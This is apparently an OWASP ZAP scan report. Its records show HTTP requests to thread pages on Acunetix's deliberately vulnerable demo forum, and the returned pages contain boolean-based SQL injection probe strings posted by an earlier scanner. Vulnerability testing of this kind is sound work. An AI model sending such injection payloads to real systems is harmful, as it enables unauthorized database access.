<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:22 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3*2<(0+5+447-447) -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=75 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=75 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=75 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:57 GMT Content-Length: 3086 |
Response Body - size: 3,086 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:38 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3*2>(0+5+447-447) -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=76 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=76 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=76 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:57 GMT Content-Length: 3100 |
Response Body - size: 3,100 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:54 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 2+813-813-1=0+0+0+1 or 'OI38CHHi'='</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=77 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=77 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=77 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:59 GMT Content-Length: 3100 |
Response Body - size: 3,100 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:54 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3+813-813-1=0+0+0+1 or 'OI38CHHi'='</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=78 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=78 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=78 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:59 GMT Content-Length: 3098 |
Response Body - size: 3,098 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:17:01 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3*2<(0+5+813-813) or 'OI38CHHi'='</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=79 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=79 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=79 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:59 GMT Content-Length: 3098 |
Response Body - size: 3,098 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:17:01 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3*2>(0+5+813-813) or 'OI38CHHi'='</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=8 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 415 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:48 GMT Content-Length: 3074 |
Response Body - size: 3,074 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>http://xfs.bxss.me</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=80 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=80 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=80 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:59 GMT Content-Length: 3088 |
Response Body - size: 3,088 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:17:02 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1" OR 2+332-332-1=0+0+0+1 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=81 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=81 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=81 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:59 GMT Content-Length: 3088 |
Response Body - size: 3,088 bytes. |
